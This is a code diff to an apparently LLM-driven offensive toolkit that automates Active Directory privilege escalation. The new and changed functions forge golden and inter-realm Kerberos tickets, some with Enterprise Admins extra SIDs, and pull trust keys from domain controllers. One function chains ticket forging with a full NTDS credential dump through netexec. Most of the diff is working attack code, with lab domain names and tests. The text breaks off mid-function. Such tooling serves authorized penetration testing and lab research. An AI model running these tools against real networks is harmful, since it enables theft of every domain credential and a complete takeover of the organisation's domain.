index 050d125d..351c0f86 100644
--- a/ares-tools/src/privesc/cve_exploits.rs
+++ b/ares-tools/src/privesc/cve_exploits.rs
@@ -74,6 +74,8 @@ mod tests {
     use crate::args::{optional_bool, optional_str, required_str};
     use serde_json::json;
 
+    // --- nopac ---
+
     #[test]
     fn nopac_missing_domain() {
         let args = json!({
@@ -177,6 +179,8 @@ mod tests {
         assert!(shell);
     }
 
+    // --- printnightmare ---
+
     #[test]
     fn printnightmare_missing_target() {
         let args = json!({
@@ -216,6 +220,8 @@ mod tests {
         assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local");
     }
 
+    // --- petitpotam_unauth ---
+
     #[test]
    fn petitpotam_unauth_missing_listener() {
         let args = json!({
@@ -242,6 +248,8 @@ mod tests {
         assert_eq!(required_str(&args, "target").unwrap(), "dc01.contoso.local");
     }
 
+    // --- mock executor tests ---
+
     use super::*;
     use crate::executor::mock;
 
diff --git a/ares-tools/src/privesc/delegation.rs b/ares-tools/src/privesc/delegation.rs
index b2ac80f9..48597d8d 100644
--- a/ares-tools/src/privesc/delegation.rs
+++ b/ares-tools/src/privesc/delegation.rs
@@ -81,9 +81,12 @@ pub async fn generate_golden_ticket(args: &Value) -> Result<ToolOutput> {
     let domain = required_str(args, "domain")?;
     let extra_sid = optional_str(args, "extra_sid");
     let username = optional_str(args, "username").unwrap_or("Administrator");
+    // -nthash expects a 32-char NT hash; strip any LM half if the LLM
+    // passed a `LM:NT` concatenated form.
+    let nt = credentials::nt_hash_only(krbtgt_hash);
 
     CommandBuilder::new("impacket-ticketer")
-        .flag("-nthash", krbtgt_hash)
+        .flag("-nthash", nt)
        .flag("-domain-sid", domain_sid)
         .flag("-domain", domain)
         .flag_opt("-extra-sid", extra_sid)
@@ -196,18 +199,37 @@ pub async fn krbrelayup(args: &Value) -> Result<ToolOutput> {
 ///
 /// Required args: `child_domain`, `username`
 /// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one required.
-/// Optional args: `target_domain`
+/// Optional args: `child_dc_ip`, `parent_domain`, `parent_dc_ip` — when supplied,
+/// these are written to `/etc/hosts` so the impacket script can resolve domain
+/// FQDNs without forest DNS access. raiseChild itself only takes the positional
+/// `domain/user[:pass]` + auth flags; the IP args are NOT forwarded to it.
+///
+/// raiseChild auto-discovers the parent forest root via the child DC's
+/// trustedDomain LDAP objects, so callers don't need to supply parent FQDN
+/// or DC IPs to the script. But raiseChild *does* call `gethostbyname()` /
+/// SMB-binds against the bare domain name (e.g. `child.contoso.local`),
+/// not the DC FQDN — so on a worker without forest DNS this fails with
+/// `Name or service not known`. Pre-seeding `/etc/hosts` fixes that.
 pub async fn raise_child(args: &Value) -> Result<ToolOutput> {
     let child_domain = required_str(args, "child_domain")?;
     let username = required_str(args, "username")?;
     let password = optional_str(args, "password");
     let hash = optional_str(args, "hash");
-    let target_domain = optional_str(args, "target_domain");
+    let child_dc_ip = optional_str(args, "child_dc_ip").filter(|s| !s.is_empty());
+    let parent_domain = optional_str(args, "parent_domain").filter(|s| !s.is_empty());
+    let parent_dc_ip = optional_str(args, "parent_dc_ip").filter(|s| !s.is_empty());
 
     if password.is_none() && hash.is_none() {
         anyhow::bail!("raise_child requires either 'password' or 'hash' for authentication");
     }
 
+    if let Some(ip) = child_dc_ip {
+        crate::privesc::trust::ensure_hosts_entry(ip, child_domain)?;
+    }
+    if let (Some(pd), Some(pip)) = (parent_domain, parent_dc_ip) {
+        crate::privesc::trust::ensure_hosts_entry(pip, pd)?;
+    }
+
     let mut cmd = CommandBuilder::new("raiseChild.py");
 
     if let Some(h) = hash {
@@ -218,8 +240,6 @@ pub async fn raise_child(args: &Value) -> Result<ToolOutput> {
         cmd = cmd.arg(format!("{child_domain}/{username}:{p}"));
     }
 
-    cmd = cmd.flag_opt("-target-domain", target_domain);
-
     // raiseChild performs multiple secretsdumps internally — needs extra time
     cmd.timeout_secs(300).execute().await
 }
@@ -686,6 +706,8 @@ mod tests {
         assert_eq!(val, "/tmp/admin.ccache");
     }
 
+    // --- mock executor tests ---
+
     use super::*;
     use crate::executor::mock;
 
diff --git a/ares-tools/src/privesc/gmsa.rs b/ares-tools/src/privesc/gmsa.rs
index f7edfd3c..9250965c 100644
--- a/ares-tools/src/privesc/gmsa.rs
+++ b/ares-tools/src/privesc/gmsa.rs
@@ -74,6 +74,8 @@ mod tests {
     use crate::args::{optional_str, required_str};
     use serde_json::json;
 
+    // --- gmsa_dump_passwords ---
+
     #[test]
     fn gmsa_dump_passwords_requires_dc_ip() {
         let args = json!({
@@ -121,6 +123,8 @@ mod tests {
         assert_eq!(optional_str(&args, "domain"), Some("contoso.local"));
     }
 
+    // --- unconstrained_tgt_dump ---
+
     #[test]
     fn unconstrained_tgt_dump_missing_domain() {
         let args = json!({
@@ -178,6 +182,8 @@ mod tests {
         );
     }
 
+    // --- unconstrained_coerce_and_capture ---
+
     #[test]
     fn unconstrained_coerce_missing_coerce_from() {
         let args = json!({
@@ -217,6 +223,8 @@ mod tests {
         assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local");
     }
 
+    // --- mock executor tests ---
+
     use super::*;
     use crate::executor::mock;
 
diff --git a/ares-tools/src/privesc/trust.rs b/ares-tools/src/privesc/trust.rs
index a02dfce1..e81e8787 100644
--- a/ares-tools/src/privesc/trust.rs
+++ b/ares-tools/src/privesc/trust.rs
@@ -1,6 +1,6 @@
 //! Trust / cross-forest tool executors.
 
-use anyhow::Result;
+use anyhow::{Context, Result};
 use serde_json::Value;
 
 use crate::args::{optional_str, required_str};
@@ -8,18 +8,68 @@ use crate::credentials;
 use crate::executor::CommandBuilder;
 use crate::ToolOutput;
 
+/// Embedded Python helper that does a cross-realm TGS-REQ using a forged
+/// inter-realm TGT. See `forge_inter_realm_and_dump` for why this exists.
+const CROSS_REALM_TGS_HELPER: &str = include_str!("cross_realm_tgs.py");
+
+/// Idempotently ensure `/etc/hosts` contains an `<ip> <hostname>` mapping so
+/// callers using FQDNs (Kerberos SPN match) can resolve them on a worker that
+/// has no DNS path to the lab forest. Reads the current file, returns Ok if
+/// any line already maps the hostname to the given IP, otherwise appends a
+/// new entry.
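+/// e.g. `ensure_hosts_entry("192.168.58.20", "fabrikam.local")` appends the
+/// line `192.168.58.20 fabrikam.local` on first call and is a no-op after.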
+/// Idempotently ensure `/etc/hosts` contains an `<ip> <hostname>` mapping so
+/// callers using FQDNs (Kerberos SPN match) can resolve them on a worker that
+/// has no DNS path to the lab forest. Reads the current file and returns Ok
+/// if a non-commented line already maps the hostname to the given IP;
+/// otherwise appends a new entry. The append is racy across concurrent runs,
+/// but a duplicate line is harmless and `getaddrinfo` returns the first
+/// match, so we don't lock.
+///
+/// Errors are surfaced — failing to write `/etc/hosts` would leave the caller
+/// to silently fail at `nxc` time, which is exactly the symptom we're fixing.
+pub(super) fn ensure_hosts_entry(ip: &str, hostname: &str) -> Result<()> {
+    use std::io::Write as _;
+    let path = "/etc/hosts";
+    let current = std::fs::read_to_string(path)
+        .with_context(|| format!("failed to read {path} for hostname mapping"))?;
+    for line in current.lines() {
+        // Strip trailing comments, then compare whitespace-delimited fields —
+        // `split_whitespace` handles both tab- and space-separated entries.
+        let entry = line.split('#').next().unwrap_or("");
+        let mut fields = entry.split_whitespace();
+        if fields.next() == Some(ip) && fields.any(|f| f.eq_ignore_ascii_case(hostname)) {
+            return Ok(());
+        }
+    }
+    let mut f = std::fs::OpenOptions::new()
+        .append(true)
+        .open(path)
+        .with_context(|| format!("failed to open {path} for hostname mapping"))?;
+    writeln!(f, "{ip} {hostname}").with_context(|| format!("failed to append to {path}"))?;
+    Ok(())
+}
+
 /// Extract trust keys by dumping secrets for a trusted domain's machine account.
 ///
-/// Required args: `domain`, `username`, `password`, `dc_ip`, `trusted_domain`
+/// Required args: `domain`, `username`, `dc_ip`, `trusted_domain`
+/// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one
+/// non-empty value required — an empty `password` would trigger an interactive
+/// `getpass()` prompt inside impacket-secretsdump and EOF the agent's stdin.
 pub async fn extract_trust_key(args: &Value) -> Result<ToolOutput> {
     let domain = required_str(args, "domain")?;
     let username = required_str(args, "username")?;
-    let password = required_str(args, "password")?;
+    let password = optional_str(args, "password").filter(|s| !s.is_empty());
+    let hash = optional_str(args, "hash").filter(|s| !s.is_empty());
     let dc_ip = required_str(args, "dc_ip")?;
     let trusted_domain = required_str(args, "trusted_domain")?;

+    if password.is_none() && hash.is_none() {
+        anyhow::bail!(
+            "extract_trust_key requires non-empty 'password' or 'hash' for authentication"
+        );
+    }
+
     let (target_str, extra_args) =
-        credentials::impacket_auth(Some(domain), username, Some(password), None, dc_ip);
+        credentials::impacket_auth(Some(domain), username, password, hash, dc_ip);

     let just_dc_user = format!("{trusted_domain}$");
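(Aside, not part of the diff: every forging path below first normalizes the trust key through `credentials::nt_hash_only`, which this diff does not show. Judging from the inline `rsplit(':')` logic in recon.rs, its assumed behavior is:)

    // Keep only the NT half of an `LM:NT` pair; bare NT hashes pass through.
    // nt_hash_only("aad3b435...:2e993405...") == "2e993405..."
    fn nt_hash_only(hash: &str) -> &str {
        hash.rsplit(':').next().unwrap_or(hash)
    }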
@@ -36,28 +86,335 @@ pub async fn extract_trust_key(args: &Value) -> Result<ToolOutput> {
 ///
-/// Required args: `trust_key`, `source_sid`, `source_domain`, `target_sid`,
-/// `target_domain`
-/// Optional args: `username`
+/// Required args: `trust_key`, `source_sid`, `source_domain`, `target_domain`
+/// Optional args: `username`, `extra_sid`, `aes_key`, and `target_sid`
+/// (accepted for schema parity with `forge_inter_realm_and_dump` but unused)
+///
+/// For child-to-parent escalation (same forest), pass `extra_sid` with the
+/// parent domain's Enterprise Admins SID (e.g. `S-1-5-21-…-519`).
+/// For cross-forest trusts, omit `extra_sid` — SID filtering blocks RIDs < 1000.
+///
+/// When `aes_key` is supplied, prefer it over the NT hash — Win2016+ KDCs
+/// validate AES256 inter-realm tickets without RC4. impacket-ticketer rejects
+/// both flags simultaneously ("Pick only one" — it exits without writing a
+/// ccache), so we choose AES when available and fall back to the NT hash
+/// otherwise. NT-only tickets validate against dc01.fabrikam.local in the
+/// lab — verified working for a cross-realm bloodyAD LDAP bind.
 pub async fn create_inter_realm_ticket(args: &Value) -> Result<ToolOutput> {
     let trust_key = required_str(args, "trust_key")?;
     let source_sid = required_str(args, "source_sid")?;
     let source_domain = required_str(args, "source_domain")?;
-    let target_sid = required_str(args, "target_sid")?;
+    // target_sid is unused by ticketer but accepted for schema parity with
+    // forge_inter_realm_and_dump; ticketer derives the realm from -domain.
+    let _target_sid = optional_str(args, "target_sid");
     let target_domain = required_str(args, "target_domain")?;
     let username = optional_str(args, "username").unwrap_or("Administrator");
+    let extra_sid = optional_str(args, "extra_sid");
+    let aes_key = optional_str(args, "aes_key").filter(|s| !s.is_empty());
+    // Optional service-ticket pre-fetch params. When supplied, after forging
+    // the inter-realm TGT we chain cross_realm_tgs.py to also obtain
+    // ldap/<dc_fqdn> and cifs/<dc_fqdn> service tickets, appended into the
+    // same ccache. This is required because MIT GSSAPI clients (e.g.
+    // `ldapsearch -Y GSSAPI`) cannot walk a referral starting from
+    // `krbtgt/<target>@<source>` — they need a service-ticket entry already
+    // present. Without these, the inter-realm TGT is unusable for ldapsearch
+    // even though it is a valid Kerberos credential.
+    let target_dc_fqdn = optional_str(args, "target_dc_fqdn").filter(|s| !s.is_empty());
+    let target_dc_ip = optional_str(args, "target_dc_ip").filter(|s| !s.is_empty());

-    let extra_sid = format!("{target_sid}-519");
     let spn = format!("krbtgt/{target_domain}");
-
-    CommandBuilder::new("impacket-ticketer")
-        .flag("-nthash", trust_key)
+    // -nthash expects a 32-char hex NT hash. LLMs frequently pass the
+    // concatenated `LM:NT` form harvested from secretsdump output, which
+    // ticketer rejects with `'Odd-length string'`. Strip to the NT half.
+    let nt = credentials::nt_hash_only(trust_key);
+
+    // Write to a deterministic per-operation directory under /tmp so
+    // downstream tools on the same host can consume the ccache without
+    // knowing the CWD at ticket-forge time. The name encodes the
+    // (source, target, user) triple, so concurrent forge calls for
+    // different triples never collide.
+    let ticket_dir = std::path::PathBuf::from("/tmp/ares-tickets");
+    let _ = std::fs::create_dir_all(&ticket_dir);
+    let safe_src = source_domain.replace('.', "_");
+    let safe_tgt = target_domain.replace('.', "_");
+    let ccache_name = format!("{safe_src}__{safe_tgt}__{username}.ccache");
+    let ccache_path = ticket_dir.join(&ccache_name);
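+    // e.g. forging child.contoso.local -> contoso.local as Administrator
+    // lands at /tmp/ares-tickets/child_contoso_local__contoso_local__Administrator.ccache.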
+
+    // impacket-ticketer accepts only one of -nthash/-aesKey ("Pick only
+    // one"), so when we plan to chain cross_realm_tgs.py (target_dc_fqdn +
+    // target_dc_ip both present), force NT-only: impacket has a
+    // salt-derivation bug on trust accounts, and tickets forged with -aesKey
+    // produce KRB_AP_ERR_BAD_INTEGRITY when used as TGT input to a
+    // subsequent cross-realm getKerberosTGS call. NT-only avoids the bad
+    // salt path. When the chain is NOT requested (no target_dc_*), AES is
+    // fine for the TGT alone (LDAP-bind callers can use it directly).
+    let chain_requested = target_dc_fqdn.is_some() && target_dc_ip.is_some();
+    let mut cmd = CommandBuilder::new("impacket-ticketer")
+        .flag("-domain-sid", source_sid)
+        .flag("-domain", source_domain);
+
+    if chain_requested {
+        cmd = cmd.flag("-nthash", nt);
+    } else if let Some(aes) = aes_key {
+        cmd = cmd.flag("-aesKey", aes);
+    } else {
+        cmd = cmd.flag("-nthash", nt);
+    }
+
+    if let Some(es) = extra_sid {
+        cmd = cmd.flag("-extra-sid", es);
+    }
+
+    // Run in ticket_dir so impacket-ticketer writes <username>.ccache there,
+    // then rename to the deterministic ccache_path.
+    let mut output = cmd
+        .flag("-spn", spn)
+        .arg(username)
+        .current_dir(&ticket_dir)
+        .timeout_secs(120)
+        .execute()
+        .await?;
+
+    // impacket-ticketer writes `<username>.ccache` in cwd. Rename it to our
+    // deterministic path (this also handles the common case where username
+    // is "Administrator").
+    let default_ccache = ticket_dir.join(format!("{username}.ccache"));
+    if default_ccache.exists() && default_ccache != ccache_path {
+        let _ = std::fs::rename(&default_ccache, &ccache_path);
+    }
+
+    // Optional Step 2: chain cross_realm_tgs.py to fetch ldap/<dc_fqdn> and
+    // cifs/<dc_fqdn> service tickets and append them to the same ccache. This
+    // turns the otherwise-unusable inter-realm TGT into a ccache that
+    // `ldapsearch -Y GSSAPI` can consume directly.
+    if ccache_path.exists() {
+        if let (Some(dc_fqdn), Some(dc_ip)) = (target_dc_fqdn, target_dc_ip) {
+            let helper_path = ticket_dir.join("cross_realm_tgs.py");
+            if let Err(e) = std::fs::write(&helper_path, CROSS_REALM_TGS_HELPER) {
+                output.stdout.push_str(&format!(
+                    "\n[!] failed to write cross_realm_tgs helper: {e}\n"
+                ));
+            } else {
+                for spn in [format!("ldap/{dc_fqdn}"), format!("cifs/{dc_fqdn}")] {
+                    let res = CommandBuilder::new("python3")
+                        .arg(helper_path.to_string_lossy().into_owned())
+                        .flag("--in-ccache", ccache_path.to_string_lossy().into_owned())
+                        .flag("--out-ccache", ccache_path.to_string_lossy().into_owned())
+                        .flag("--spn", &spn)
+                        .flag("--source-realm", source_domain.to_uppercase())
+                        .flag("--target-realm", target_domain.to_uppercase())
+                        .flag("--target-kdc", dc_ip)
+                        .arg("--append")
+                        .current_dir(&ticket_dir)
+                        .timeout_secs(120)
+                        .execute()
+                        .await;
+                    match res {
+                        Ok(svc_out) => {
+                            output.stdout.push_str(&format!(
+                                "\n=== service ticket {spn} ===\n{}\n{}\n",
+                                svc_out.stdout, svc_out.stderr
+                            ));
+                            if !svc_out.success {
+                                output.stdout.push_str(&format!(
+                                    "[!] service ticket fetch for {spn} failed (exit {:?})\n",
+                                    svc_out.exit_code
+                                ));
+                            }
+                        }
+                        Err(e) => {
+                            output.stdout.push_str(&format!(
+                                "\n[!] service ticket fetch for {spn} errored: {e}\n"
+                            ));
+                        }
+                    }
+                }
+            }
+        }
+    }
+
+    // Append the ticket path to stdout so the orchestrator can parse it.
+    if ccache_path.exists() {
+        output
+            .stdout
+            .push_str(&format!("\nARES_TICKET_PATH={}\n", ccache_path.display()));
+    }
+
+    Ok(output)
+}
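(Aside, not part of the diff: `ARES_TICKET_PATH=` is a plain-text contract between worker stdout and the dispatcher. The consuming side — function name hypothetical — reduces to:)

    fn parse_ticket_path(stdout: &str) -> Option<&str> {
        // First marker wins; the worker emits at most one per invocation.
        stdout.lines().find_map(|l| l.strip_prefix("ARES_TICKET_PATH="))
    }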
+
+/// Forge an inter-realm Kerberos ticket, request a TGS for the target DC,
+/// then run `nxc smb --ntds` against it — all in a single worker invocation.
+///
+/// This wraps the impacket forge-and-present workaround for the cross-realm
+/// referral bug (fortra/impacket#315) into ONE deterministic tool call so
+/// the orchestrator can dispatch every parameter directly, without laundering
+/// the trust key / SIDs through an LLM. All three steps share a tempdir as
+/// cwd, so the ccache files produced are colocated on disk.
+///
+/// Why three steps and not two:
+/// 1. **ticketer** forges the inter-realm TGT (krbtgt/<target_domain> issued
+///    by <source_domain>) using the trust key. Forced to **NT-only** —
+///    impacket has a salt-derivation bug on trust accounts that yields
+///    `KRB_AP_ERR_BAD_INTEGRITY` whenever the AES key is supplied alongside
+///    the NT hash. The NT-only ticket validates against modern KDCs.
+/// 2. **`cross_realm_tgs.py`** (embedded helper) loads the inter-realm TGT
+///    directly and calls `getKerberosTGS` against the target KDC for
+///    `cifs/<target>`. We can't use `impacket-getST -k -no-pass` here:
+///    impacket's `CCache.parseFile` only matches `krbtgt/<realm>@<realm>`
+///    (intra-realm TGTs), so the inter-realm credential
+///    `krbtgt/<target>@<source>` is silently ignored. getST then falls
+///    through to no-pass auth that returns `KDC_ERR_WRONG_REALM` with exit
+///    code 0, hiding the failure.
+/// 3. **nxc smb --ntds** dumps NTDS using the TGS via the Kerberos cache.
+///    `impacket-secretsdump` is unusable here: its DRSUAPI bind rejects
+///    cross-realm TGS auth with `Bind context rejected: invalid_checksum`.
+///    netexec's `--ntds vss` path uses a different bind sequence that
+///    accepts the cross-realm credential.
+///
+/// Required args: `trust_key`, `source_sid`, `source_domain`, `target_domain`,
+/// `target` (DC host FQDN, used for `cifs/<target>` SPN matching)
+/// Optional args: `target_sid` (kept for parity), `username` (default
+/// "Administrator"), `extra_sid` (child→parent only — omit for
+/// cross-forest), `dc_ip` (used as the target KDC for the TGS request and
+/// pre-seeded into `/etc/hosts` so nxc's FQDN connect resolves).
+pub async fn forge_inter_realm_and_dump(args: &Value) -> Result<ToolOutput> {
+    let trust_key = required_str(args, "trust_key")?;
+    let source_sid = required_str(args, "source_sid")?;
+    let source_domain = required_str(args, "source_domain")?;
+    let target_domain = required_str(args, "target_domain")?;
+    let target = required_str(args, "target")?;
+    // target_sid is currently unused by ticketer but accepted for API parity
+    // with create_inter_realm_ticket; ticketer derives the realm from -domain.
+    let _target_sid = optional_str(args, "target_sid");
+    let username = optional_str(args, "username")
+        .unwrap_or("Administrator")
+        .to_string();
+    let extra_sid = optional_str(args, "extra_sid");
+    let dc_ip = optional_str(args, "dc_ip");
+
+    let nt = credentials::nt_hash_only(trust_key);
+
+    let tempdir = tempfile::tempdir().context("failed to create tempdir for inter-realm forge")?;
+    let cwd = tempdir.path().to_path_buf();
+
+    // --- Step 1: forge the inter-realm TGT (NT-only) ---
+    let krbtgt_spn = format!("krbtgt/{target_domain}");
+    let mut ticketer = CommandBuilder::new("impacket-ticketer")
+        .flag("-nthash", nt)
+        .flag("-domain-sid", source_sid)
+        .flag("-domain", source_domain);
+    if let Some(es) = extra_sid {
+        ticketer = ticketer.flag("-extra-sid", es);
+    }
+    let ticketer_output = ticketer
+        .flag("-spn", krbtgt_spn)
+        .arg(&username)
+        .current_dir(&cwd)
+        .timeout_secs(120)
+        .execute()
+        .await?;
+
+    if !ticketer_output.success {
+        return Ok(ticketer_output);
+    }
+
+    let tgt_ccache = cwd.join(format!("{username}.ccache"));
+    if !tgt_ccache.exists() {
+        anyhow::bail!(
+            "impacket-ticketer reported success but {} was not produced",
+            tgt_ccache.display()
+        );
+    }
+
+    // --- Step 2: cross-realm TGS via the embedded helper ---
+    //
+    // Write the helper to the tempdir and invoke it. The helper opens the
+    // forged inter-realm TGT, calls `getKerberosTGS` directly against the
+    // target KDC, and writes the resulting TGS to a new ccache. See the
+    // function docstring above for why we can't use `impacket-getST` here.
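+    //
+    // Helper CLI contract (matches both invocations in this file):
+    //   python3 cross_realm_tgs.py --in-ccache <tgt.ccache> --out-ccache <out.ccache>
+    //     --spn <svc>/<fqdn> --source-realm <SRC> --target-realm <DST>
+    //     --target-kdc <host> [--append]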
+    let helper_path = cwd.join("cross_realm_tgs.py");
+    std::fs::write(&helper_path, CROSS_REALM_TGS_HELPER)
+        .context("failed to write cross_realm_tgs helper")?;
+
+    let cifs_spn = format!("cifs/{target}");
+    let tgs_ccache = cwd.join("cross_realm_tgs.ccache");
+    let target_kdc = dc_ip.unwrap_or(target);
+
+    let getst_output = CommandBuilder::new("python3")
+        .arg(helper_path.to_string_lossy().into_owned())
+        .flag("--in-ccache", tgt_ccache.to_string_lossy().into_owned())
+        .flag("--out-ccache", tgs_ccache.to_string_lossy().into_owned())
+        .flag("--spn", &cifs_spn)
+        .flag("--source-realm", source_domain.to_uppercase())
+        .flag("--target-realm", target_domain.to_uppercase())
+        .flag("--target-kdc", target_kdc)
+        .current_dir(&cwd)
+        .timeout_secs(120)
+        .execute()
+        .await?;
+
+    if !getst_output.success {
+        return Ok(ToolOutput {
+            stdout: format!(
+                "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}",
+                ticketer_output.stdout, getst_output.stdout
+            ),
+            stderr: format!(
+                "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}",
+                ticketer_output.stderr, getst_output.stderr
+            ),
+            exit_code: getst_output.exit_code,
+            success: false,
+        });
+    }
+
+    if !tgs_ccache.exists() {
+        anyhow::bail!(
+            "cross_realm_tgs helper reported success but {} was not produced",
+            tgs_ccache.display()
+        );
+    }
+
+    // --- Step 3: nxc smb --ntds via the TGS ccache ---
+    //
+    // The cached TGS is bound to `cifs/{target}` where `target` is the FQDN
+    // baked into the ticket by step 2. nxc auto-builds its SPN from the
+    // command-line target, so we MUST pass the FQDN here — passing the IP
+    // would make nxc look up `cifs/<ip>` in the cache, miss, and silently
+    // fall through with exit 0 / empty stdout.
+    //
+    // FQDN connect requires DNS, but on a stock Kali worker `/etc/resolv.conf`
+    // points at AWS internal DNS, which does not know the lab forest. Without
+    // a hosts entry the socket-layer lookup fails before nxc can speak SMB,
+    // and the same silent exit-0 failure mode shows up — masking real auth
+    // outcomes from the orchestrator's krbtgt-observation check. Append an
+    // `<ip> <target>` line to `/etc/hosts` (the worker runs as root) so
+    // getaddrinfo resolves cleanly. The append is best-effort idempotent —
+    // duplicate lines are harmless and survive concurrent runs without
+    // locking.
+    if let Some(ip) = dc_ip {
+        ensure_hosts_entry(ip, target)?;
+    }
+    let dump_output = CommandBuilder::new("nxc")
+        .arg("smb")
+        .arg(target)
+        .arg("-k")
+        .arg("--use-kcache")
+        .arg("--ntds")
+        .arg("vss")
+        .env("KRB5CCNAME", tgs_ccache.to_string_lossy().into_owned())
+        .current_dir(&cwd)
+        .timeout_secs(600)
+        .execute()
+        .await?;
+
+    let stdout = format!(
+        "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}\n=== nxc smb --ntds ===\n{}",
+        ticketer_output.stdout, getst_output.stdout, dump_output.stdout
+    );
+    let stderr = format!(
+        "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}\n--- nxc stderr ---\n{}",
+        ticketer_output.stderr, getst_output.stderr, dump_output.stderr
+    );
+    Ok(ToolOutput {
+        stdout,
+        stderr,
+        exit_code: dump_output.exit_code,
+        success: dump_output.success,
+    })
+}

 /// Look up domain SIDs using impacket-lookupsid.
@@ -126,6 +483,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- extract_trust_key --- + #[test] fn extract_trust_key_missing_trusted_domain() { let args = json!({ @@ -162,6 +521,8 @@ mod tests { assert_eq!(just_dc_user, "child.contoso.local$"); } + // --- create_inter_realm_ticket --- + #[test] fn create_inter_realm_ticket_missing_trust_key() { let args = json!({ @@ -185,7 +546,8 @@ mod tests { } #[test] - fn create_inter_realm_ticket_extra_sid_format() { + fn create_inter_realm_ticket_extra_sid_optional() { + // Without extra_sid — cross-forest case let args = json!({ "trust_key": "aabbccdd", "source_sid": "S-1-5-21-111", @@ -193,9 +555,21 @@ mod tests { "target_sid": "S-1-5-21-222", "target_domain": "contoso.local" }); - let target_sid = required_str(&args, "target_sid").unwrap(); - let extra_sid = format!("{target_sid}-519"); - assert_eq!(extra_sid, "S-1-5-21-222-519"); + assert!(optional_str(&args, "extra_sid").is_none()); + } + + #[test] + fn create_inter_realm_ticket_extra_sid_child_to_parent() { + // With extra_sid — child-to-parent case + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert_eq!(optional_str(&args, "extra_sid"), Some("S-1-5-21-222-519")); } #[test] @@ -239,6 +613,8 @@ mod tests { assert_eq!(username, "fakeuser"); } + // --- get_sid --- + #[test] fn get_sid_missing_domain() { let args = json!({ @@ -323,6 +699,8 @@ mod tests { assert_eq!(hash, Some("31d6cfe0d16ae931b73c59d7e0c089c0")); } + // --- dnstool --- + #[test] fn dnstool_missing_record_name() { let args = json!({ @@ -392,6 +770,8 @@ mod tests { assert_eq!(user_spec, "contoso.local\\admin"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; @@ -409,7 +789,7 @@ mod tests { } #[tokio::test] - async fn create_inter_realm_ticket_executes() { + async fn create_inter_realm_ticket_executes_without_extra_sid() { mock::push(mock::success()); let args = json!({ "trust_key": "aabbccdd", @@ -421,6 +801,65 @@ mod tests { assert!(create_inter_realm_ticket(&args).await.is_ok()); } + #[tokio::test] + async fn create_inter_realm_ticket_executes_with_extra_sid() { + mock::push(mock::success()); + let args = json!({ + "trust_key": "aabbccdd", + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_sid": "S-1-5-21-222", + "target_domain": "contoso.local", + "extra_sid": "S-1-5-21-222-519" + }); + assert!(create_inter_realm_ticket(&args).await.is_ok()); + } + + // --- forge_inter_realm_and_dump (arg validation only — full flow needs + // real impacket binaries and a tempdir-aware mock executor) --- + + #[test] + fn forge_inter_realm_and_dump_missing_trust_key() { + let args = json!({ + "source_sid": "S-1-5-21-111", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = rt.block_on(super::forge_inter_realm_and_dump(&args)); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("trust_key")); + } + + #[test] + fn forge_inter_realm_and_dump_missing_source_sid() { + let args = json!({ + "trust_key": "aabbccdd", + "source_domain": "child.contoso.local", + "target_domain": "contoso.local", + "target": "dc01.contoso.local" + }); + let rt = tokio::runtime::Runtime::new().unwrap(); + let result = 
rt.block_on(super::forge_inter_realm_and_dump(&args));
+        assert!(result.is_err());
+        assert!(result.unwrap_err().to_string().contains("source_sid"));
+    }
+
+    #[test]
+    fn forge_inter_realm_and_dump_missing_target() {
+        let args = json!({
+            "trust_key": "aabbccdd",
+            "source_sid": "S-1-5-21-111",
+            "source_domain": "child.contoso.local",
+            "target_domain": "contoso.local"
+        });
+        let rt = tokio::runtime::Runtime::new().unwrap();
+        let result = rt.block_on(super::forge_inter_realm_and_dump(&args));
+        assert!(result.is_err());
+        assert!(result.unwrap_err().to_string().contains("target"));
+    }
+
     #[tokio::test]
     async fn create_inter_realm_ticket_with_username_executes() {
         mock::push(mock::success());
diff --git a/ares-tools/src/recon.rs b/ares-tools/src/recon.rs
index 1bdf40e9..d86725bf 100644
--- a/ares-tools/src/recon.rs
+++ b/ares-tools/src/recon.rs
@@ -269,15 +269,23 @@ pub async fn run_bloodhound(args: &Value) -> Result<ToolOutput> {
 /// Run an LDAP search query against a target.
 ///
 /// Required args: `target`, `domain`
-/// Optional args: `username`, `password`, `base_dn`, `filter`, `attributes`
+/// Optional args: `username`, `password`, `bind_domain`, `base_dn`, `filter`,
+/// `attributes`, `ticket_path`
+///
+/// `domain` controls the base DN (the partition being queried).
+/// `bind_domain` (optional) overrides the domain used in the bind DN
+/// (`user@bind_domain`). Use this when authenticating with a credential
+/// from a different domain than the one being searched — e.g. querying
+/// a parent DC with a child-domain credential. Defaults to `domain`.
+/// `ticket_path` (optional) points at a Kerberos ccache; when set, the
+/// search binds via GSSAPI instead of a simple bind.
 pub async fn ldap_search(args: &Value) -> Result<ToolOutput> {
     let target = required_str(args, "target")?;
     let domain = required_str(args, "domain")?;
     let username = optional_str(args, "username");
     let password = optional_str(args, "password");
+    let bind_domain = optional_str(args, "bind_domain");
     let base_dn = optional_str(args, "base_dn");
     let filter = optional_str(args, "filter");
     let attributes = optional_str(args, "attributes");
+    let ticket_path = optional_str(args, "ticket_path");

     let computed_base_dn = match base_dn {
         Some(dn) => dn.to_string(),
@@ -287,13 +295,19 @@ pub async fn ldap_search(args: &Value) -> Result<ToolOutput> {
     let uri = format!("ldap://{target}");

     let mut cmd = CommandBuilder::new("ldapsearch")
-        .arg("-x")
         .flag("-H", &uri)
         .timeout_secs(120);

-    if let (Some(u), Some(p)) = (username, password) {
-        let bind_dn = format!("{u}@{domain}");
-        cmd = cmd.flag("-D", bind_dn).flag("-w", p);
